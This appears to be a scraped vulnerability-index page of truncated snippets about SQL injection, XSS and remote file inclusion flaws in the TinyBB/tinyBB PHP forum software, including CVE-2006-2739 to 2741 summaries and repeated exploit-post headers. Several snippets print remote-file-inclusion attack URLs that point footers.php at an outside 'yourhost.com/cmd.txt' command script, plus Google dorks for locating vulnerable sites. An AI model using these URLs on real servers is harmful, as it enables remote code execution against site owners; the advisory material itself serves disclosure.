TinyBB 1.2 SQL Injection Vulnerability

Exploit for php platform in category web applications +-------------------------------+ | TinyBB 1.2 SQLi Vulnerability | +-------------------------------+ Vulnerable Web-App : TinyBB 1.2 Vulnerability : SQL Injection. Author : Aodrulez. Email : email protected Google-Dork : "TinyBB 2011 all righ...

TinyBB 1.2 - SQL Injection

+-------------------------------+ | TinyBB 1.2 SQLi Vulnerability | +-------------------------------+ Vulnerable Web-App : TinyBB 1.2 Vulnerability : SQL Injection. Author : Aodrulez. Email : [email protected] Google-Dork : "TinyBB 2011 all rights reserved" Tested on : Ubuntu 10.04 +---------+...

TinyBB 1.2 SQL Injection

+-------------------------------+ | TinyBB 1.2 SQLi Vulnerability | +-------------------------------+ Vulnerable Web-App : TinyBB 1.2 Vulnerability : SQL Injection. Author : Aodrulez. Email : [email protected] Google-Dork : "TinyBB 2011 all rights reserved" Tested on : Ubuntu 10.04 +---------+...

TinyBB 1.2 - SQL Injection

TinyBB 1.2 - SQL Injection +-------------------------------+ | TinyBB 1.2 SQLi Vulnerability | +-------------------------------+ Vulnerable Web-App : TinyBB 1.2 Vulnerability : SQL Injection. Author : Aodrulez. Email : [email protected] Google-Dork : "TinyBB 2011 all rights reserved" Tested on...

tinybb-rfi.txt

Author : ShaFuck31 maiL : [email protected] Script Name : tinyBB v0.2 Message Board DownLoad Script : http://php.arsivimiz.com/indir.php?id=335 Vuln. File : footers.php Vuln. Code : requireonce$tinybbfooters; Vuln. : http://Victim.Com/ScriptPath/footers.php?tinybbfooters=shELL Thanks : BLaSTE...

tinyBB v0.2 Message Board Remote File Inc.

Author : ShaFuck31 maiL : [email protected] Script Name : tinyBB v0.2 Message Board DownLoad Script : http://php.arsivimiz.com/indir.php?id=335 Vuln. File : footers.php Vuln. Code : requireonce$tinybbfooters; Vuln. : http://Victim.Com/ScriptPath/footers.php?tinybbfooters=shELL Thanks : BLaSTE...

Remote file inclusion

PHP remote file inclusion vulnerability in footers.php in Epicdesigns tinyBB 0.3, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the tinybbfooters parameter...

CVE-2006-2739

PHP remote file inclusion vulnerability in footers.php in Epicdesigns tinyBB 0.3, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the tinybbfooters parameter...

CVE-2006-2740

Multiple SQL injection vulnerabilities in Epicdesigns tinyBB 0.3 allow remote attackers to execute arbitrary SQL commands via the 1 q parameter in a forgot.php, and the 2 username and 3 password parameters in b login.php, and other unspecified vectors...

Cross site scripting

Cross-site scripting XSS vulnerability in Epicdesigns tinyBB 0.3 allow remote attackers to inject arbitrary web script or HTML via the q parameter in forgot.php, which is echoed in an error message, and other unspecified vectors...

Sql injection

Multiple SQL injection vulnerabilities in Epicdesigns tinyBB 0.3 allow remote attackers to execute arbitrary SQL commands via the 1 q parameter in a forgot.php, and the 2 username and 3 password parameters in b login.php, and other unspecified vectors...

CVE-2006-2741

Cross-site scripting XSS vulnerability in Epicdesigns tinyBB 0.3 allow remote attackers to inject arbitrary web script or HTML via the q parameter in forgot.php, which is echoed in an error message, and other unspecified vectors...

CVE-2006-2739

CVE-2006-2739 is a PHP remote file inclusion vulnerability in the Epicdesigns tinyBB 0.3 package. When PHP register_globals is enabled, an attacker can cause arbitrary PHP code execution by exploiting the tinybb_footers parameter in footers.php. The public records describe the vulnerability and a...

CVE-2006-2740

CVE-2006-2740 describes SQL injection vulnerabilities in the Epicdesigns tinyBB 0.3 package. The affected components are the login flow and forgot/password recovery vectors: specifically the (1) q parameter in forgot.php and the (2) username and (3) password parameters in login.php, plus other un...

CVE-2006-2741

CVE-2006-2741 concerns an XSS vulnerability in Epicdesigns tinyBB 0.3. The description specifies that remote attackers can inject arbitrary script or HTML via the q parameter in forgot.php, which is echoed in an error message, and notes other unspecified vectors. The affected software is tinyBB 0...

CVE-2006-2739

PHP remote file inclusion vulnerability in footers.php in Epicdesigns tinyBB 0.3, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the tinybbfooters parameter...

Advisory: tinyBB <= 0.3 Multiple Remote Vulnerabilities.

--Security Report-- Advisory: tinyBB = 0.3 Multiple Remote Vulnerabilities. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 27/05/06 05:37 AM --- Contacts: ICQ: 10072 MSN/Email: [email protected] Web: http://www.nukedx.com --- Vendor: Epicdesigns http://www.epicdesigns.co.uk/...

tinyBB 0.3 - Remote File Inclusion / SQL Injection

tinyBB ICQ: 10072 MSN/Mail: [email protected] web: www.nukedx.com This exploits works on tinyBB = 0.3 Original advisory can be found at: http://www.nukedx.com/?viewdoc=33 http://victim/tBBPath/footers.php?tinybbfooters=http://yourhost.com/cmd.txt?...

tinyBB 0.3 - Remote File Inclusion SQL Injection

tinyBB 0.3 - Remote File Inclusion SQL Injection tinyBB ICQ: 10072 MSN/Mail: [email protected] web: www.nukedx.com This exploits works on tinyBB = 0.3 Original advisory can be found at: http://www.nukedx.com/?viewdoc=33 http://victim/tBBPath/footers.php?tinybbfooters=http://yourhost.com/cmd.txt?...

tinyBB <= 0.3 Remote (Include / SQL Injection) Vulnerabilities

No description provided by source. tinyBB = 0.3 Multiple Remote Vulnerabilities Method found by nukedx, Contacts ICQ: 10072 MSN/Mail: [email protected] web: www.nukedx.com This exploits works on tinyBB = 0.3 Original advisory can be found at: http://www.nukedx.com/?viewdoc=33...